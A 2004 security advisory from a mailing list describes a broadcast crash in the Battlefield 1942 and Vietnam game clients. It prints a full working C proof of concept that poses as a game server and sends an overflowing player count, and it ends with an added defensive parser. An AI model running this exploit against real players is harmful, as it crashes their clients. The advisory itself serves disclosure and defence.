[NT] Battlefield 1942 and Vietnam Broadcast Client Crash

From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04

    To: list@securiteam.com
    Date: 12 Dec 2004 10:28:14 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Battlefield 1942 and Vietnam Broadcast Client Crash
    ------------------------------------------------------------------------

    SUMMARY

    Battlefield 1942 and Vietnam are two of the best known and most played FPS
    games, each based on the corresponding military conflict. They are developed
    by <http://www.dice.se> Digital Illusions and were released in September 2002
    and March 2004, respectively.

    A vulnerability in the way Battlefield 1942 and Vietnam parse incoming
    data allows an attacker to cause the game client to crash.

    DETAILS

    Vulnerable Systems:
     * Battlefield 1942 versions 1.6.19 and prior
     * Battlefield Vietnam versions 1.2 and prior

    Immune Systems:
     * Battlefield 1942 version 1.6.1b
     * Battlefield Vietnam version 1.21b

    Like any other multiplayer game, Battlefield contacts a master server and
    queries it to discover the available game servers. The client then queries
    each game server for information about its current game, which is displayed
    in the in-game server browser.

    The problem lies in the parsing of these replies. When a server reports a
    very large number of players (the "numplayers" parameter) to the client,
    the client freezes completely and, a few seconds later, faults on an access
    to a NULL pointer.

    This is a passive broadcast attack in which the attacker is able to crash
    any client to which the attacker is visible as a game server.

    A proof of concept code for this Denial Of Service vulnerability is listed
    below.

    Proof Of Concept
    /*

    by Luigi Auriemma

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        typedef int socklen_t;   /* old Winsock headers lack socklen_t */
        #define close closesocket
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>
    #endif

    #define VER "0.1"
    #define BUFFSZ 2048
    #define BOOMPLAYERS 2147483647 /* BUG */
    #define BOOM "\\gamename\\%s" \
                        "\\gamever\\1.6" \
                        "\\location\\0" \
                        "\\hostname\\crash" \
                        "\\hostport\\%d" \
                        "\\mapname\\aberdeen" \
                        "\\numplayers\\%u" \
                        "\\maxplayers\\%u" /* need not be the same value */ \
                        "\\final\\" \
                        "\\queryid\\1.1"

    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                len,
                pcklen,
                on = 1;
        socklen_t psz;           /* recvfrom() expects socklen_t, not int */
        u_short port;
        char buff[BUFFSZ + 1],   /* plain char: passed to snprintf/printf */
             pck[BUFFSZ + 1];

        setbuf(stdout, NULL);

        fputs("\n"
            "Battlefield broadcast client crash "VER"\n"
            " 1942 <= 1.6.19 and Vietnam <= 1.2\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 3) {
            printf("\n"
                "Usage: %s <game> <port>\n"
                "\n"
                "Game:\n"
                " bfvietnam = Battlefield Vietnam\n"
                " bfield1942 = Battlefield 1942\n"
                " bfield1942sw = Battlefield 1942: Secret Weapons of WW2\n"
                " bfield1942rtr = Battlefield 1942: Road to Rome\n"
                " bfield1942swd = Battlefield 1942: Secret Weapons of WW2 Demo\n"
                " bfield1942d = Battlefield 1942 Demo\n"
                "\n"
                "Port:\n"
                " 23000 = default Internet port\n"
                " 22000 = default LAN port\n"
                "\n", argv[0]);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        port = atoi(argv[2]);

        peer.sin_addr.s_addr = INADDR_ANY;
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;
        psz = sizeof(peer);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        pcklen = snprintf(
            pck,
            BUFFSZ,
            BOOM,
            argv[1],
            port,
            BOOMPLAYERS,
            BOOMPLAYERS);
        if((pcklen < 0) || (pcklen > BUFFSZ)) exit(1);

        fputs("Clients:\n", stdout);
        for(;;) {
            psz = sizeof(peer);  /* reset: recvfrom() overwrites the length */
            len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
            if(len < 0) continue;
            buff[len] = 0x00;

            printf("%16s:%5hu %s\n",
                inet_ntoa(peer.sin_addr), ntohs(peer.sin_port),
                buff);

            if(sendto(sd, pck, pcklen, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0)
              std_err();
        }

        close(sd);
        return(0);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif
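    The defensive counterpart, added here and not part of the advisory or of the
    PoC above: a strict parser for the backslash-delimited status reply the PoC
    sends, which rejects a reply whose numplayers or maxplayers value is
    unparseable, inconsistent or above a sane ceiling before the client ever uses
    it. The MAX_SLOTS ceiling and the function names are assumptions, not values
    taken from the game.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SLOTS 256   /* assumed sane ceiling on player slots, not a game constant */
struct status { unsigned long numplayers, maxplayers; };

/* Strict unsigned decimal: no sign, no trailing junk, no overflow. */
static int parse_uint(const char *s, size_t n, unsigned long *out) {
    char tmp[32], *end;
    if (n == 0 || n >= sizeof(tmp) || s[0] == '-' || s[0] == '+') return -1;
    memcpy(tmp, s, n);
    tmp[n] = '\0';
    errno = 0;
    *out = strtoul(tmp, &end, 10);
    return (errno != 0 || *end != '\0') ? -1 : 0;
}

/* Walk "\key\value" pairs up to "\final\"; 0 only if both counts parse and are plausible. */
int parse_status_reply(const char *buf, struct status *st) {
    const char *p = buf;
    int have_num = 0, have_max = 0;
    st->numplayers = st->maxplayers = 0;
    while (*p == '\\') {
        const char *key = p + 1, *kend = strchr(key, '\\');
        if (!kend) return -1;                   /* key without a value */
        size_t klen = (size_t)(kend - key);
        if (klen == 5 && memcmp(key, "final", 5) == 0) break;
        const char *val = kend + 1, *vend = strchr(val, '\\');
        if (!vend) return -1;                   /* reply never reached \final\ */
        size_t vlen = (size_t)(vend - val);
        if (klen == 10 && memcmp(key, "numplayers", 10) == 0) {
            if (parse_uint(val, vlen, &st->numplayers)) return -1;
            have_num = 1;
        } else if (klen == 10 && memcmp(key, "maxplayers", 10) == 0) {
            if (parse_uint(val, vlen, &st->maxplayers)) return -1;
            have_max = 1;
        }
        p = vend;
    }
    if (!have_num || !have_max) return -1;
    if (st->maxplayers > MAX_SLOTS || st->numplayers > st->maxplayers) return -1;
    return 0;
}

/* The player count a client may trust, or -1 when the reply must be dropped. */
long trusted_numplayers(const char *buf) {
    struct status st;
    return parse_status_reply(buf, &st) == 0 ? (long)st.numplayers : -1;
}
```

    Fed the exact reply the PoC builds (numplayers and maxplayers both 2147483647),
    the parser returns -1 and the client never sizes anything from that value.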

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.


